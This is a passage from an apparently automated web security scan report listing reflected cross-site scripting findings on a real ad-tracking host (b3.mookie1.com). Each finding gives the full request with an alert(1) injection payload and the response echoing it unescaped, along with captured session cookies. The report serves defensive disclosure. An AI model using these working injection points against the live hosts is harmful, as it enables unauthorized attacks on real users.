Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f17b'-alert(1)-'4fa911899ce was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions4f17b'-alert(1)-'4fa911899ce&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2012
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions4f17b'-alert(1)-'4fa911899ce&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction
...[SNIP]...

1.206. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de44a"><script>alert(1)</script>c65a5f2b13a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxisde44a"><script>alert(1)</script>c65a5f2b13a/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxisde44a"><script>alert(1)</script>c65a5f2b13a/923751385/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.207. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5159"><script>alert(1)</script>3c6e9657592 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1438791285@x54d5159"><script>alert(1)</script>3c6e9657592?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/1271421515/x54d5159"><script>alert(1)</script>3c6e9657592/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.208. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abb35'-alert(1)-'0f9fc7a2f26 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutionsabb35'-alert(1)-'0f9fc7a2f26 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2012
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...

imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutionsabb35'-alert(1)-'0f9fc7a2f26';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.209. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10a6b'-alert(1)-'1de419fd19d was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=10a6b'-alert(1)-'1de419fd19d&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2012
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
ument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=10a6b'-alert(1)-'1de419fd19d&Section=Solutions';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsectio
...[SNIP]...

1.210. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fddaf'-alert(1)-'f9b6676c680 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxisfddaf'-alert(1)-'f9b6676c680&_RM_HTML_referer_=&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2068
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxisfddaf'-alert(1)-'f9b6676c680&_RM_HTML_referer_=&Section=Solutions';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section
...[SNIP]...

1.211. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 371c0'-alert(1)-'939e61e8ef5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions&371c0'-alert(1)-'939e61e8ef5=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2015
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions&371c0'-alert(1)-'939e61e8ef5=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.212. http://b3.mookie1.com/2/TRACK_Xaxis/1493531948@x54 [&_RM_HTML_url_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1493531948@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd022'-alert(1)-'742f0354efb was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1493531948@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/workdd022'-alert(1)-'742f0354efb&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1987
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
rnal preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/workdd022'-alert(1)-'742f0354efb&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=&Section=Work';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var x
...[SNIP]...

1.213. http://b3.mookie1.com/2/TRACK_Xaxis/1493531948@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1493531948@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e53"><script>alert(1)</script>88c7252dde4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis89e53"><script>alert(1)</script>88c7252dde4/1493531948@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis89e53"><script>alert(1)</script>88c7252dde4/1892361332/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.214. http://b3.mookie1.com/2/TRACK_Xaxis/1493531948@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1493531948@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b35b7"><script>alert(1)</script>a2b77b6a5ac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1493531948@x54b35b7"><script>alert(1)</script>a2b77b6a5ac?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/224908634/x54b35b7"><script>alert(1)</script>a2b77b6a5ac/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.215. http://b3.mookie1.com/2/TRACK_Xaxis/1493531948@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1493531948@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c80a'-alert(1)-'da33052ba31 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1493531948@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=&Section=Work4c80a'-alert(1)-'da33052ba31 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1987
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
nt = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=&Section=Work4c80a'-alert(1)-'da33052ba31';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.216. http://b3.mookie1.com/2/TRACK_Xaxis/1493531948@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1493531948@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5816a'-alert(1)-'01aa8e4ee7f was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1493531948@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=5816a'-alert(1)-'01aa8e4ee7f&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1987
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=5816a'-alert(1)-'01aa8e4ee7f&Section=Work';
qs=qs.toLowerCase();

